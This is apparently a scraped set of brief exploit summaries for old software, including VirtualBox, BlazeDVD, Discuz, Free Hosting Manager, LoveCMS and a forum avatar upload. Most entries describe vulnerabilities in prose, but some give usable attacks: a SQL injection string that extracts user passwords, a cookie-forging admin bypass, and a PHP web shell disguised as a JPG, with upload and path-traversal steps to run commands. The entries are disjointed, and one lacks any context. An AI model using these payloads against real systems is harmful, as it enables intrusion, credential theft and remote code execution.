An input validation vulnerability was discovered within VirtualBox's 'VBoxDrv.sys' driver that could allow an attacker, with local but unprivileged access to a host where VirtualBox is installed, to execute arbitrary code within the context of the kernel.
BlazeDVD 5.0 suffers from a buffer overflow vulnerability that can be exploited via a crafted PLF playlist file, locally and remotely. It fails to perform boundary checking of the user input file, allowing EIP to be overwritten and thus giving control of the next instruction the software executes. After successful exploitation, calc.exe will be executed. Failed attempts will result in Denial of Service (DoS).
Anigif.ocx by www.jcomsoft.com can be found distributed with some applications. There is a stack-based buffer overflow in the ReadGIF and ReadGIF2 methods. After the first exception, which will be handled by IE, when the object is released we reach RtlpCoalesceFreeBlocks owning eax and ecx with Windows XP SP1, or the second check of safe-unlink with SP2, in a standard heap overflow scenario.
Ppim v1.0 is vulnerable to file delete and XSS attacks. The file delete vulnerability is present in the upload.php file, which can be exploited by sending a specially crafted HTTP request to the vulnerable script. The XSS vulnerability is present in the events.php file, which can be exploited by sending a specially crafted HTTP request to the vulnerable script.
This exploit is used to gain access to the password of a user in Discuz 6.0.1. It works by sending a POST request to the index.php page with the action set to search and the searchid set to 22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=<user_id>/*&do=submit. This will return the password of the user with the given user ID.
The admin panel of Free Hosting Manager 1.2 & 2.0 is vulnerable to insecure cookie handling. An attacker can set the adminuser and loggedin cookies to 1, which will give them access to the admin panel.
Quate CMS 0.3.4 is vulnerable to a Local File Include vulnerability. This vulnerability can be exploited by remote attackers to gain system access.
Simply change the site settings by using the post_vars array to set the values of the site settings.
This exploit allows an attacker to add a side block containing PHP code to the LoveCMS website. The code is executed when the page is loaded.
Avatar evil.jpg source: <? system($_GET['cmd']); ?> Enter to upload: http://www.site.com/forum/profile.php?action=editprofile&id=[Your User ID] See the avatar name at your profile. Upload evil avatar and go to: index.php?custom=yes&TID=../../attachments/avatars/[Avatar Name]&ext=jpg&cmd=ls -al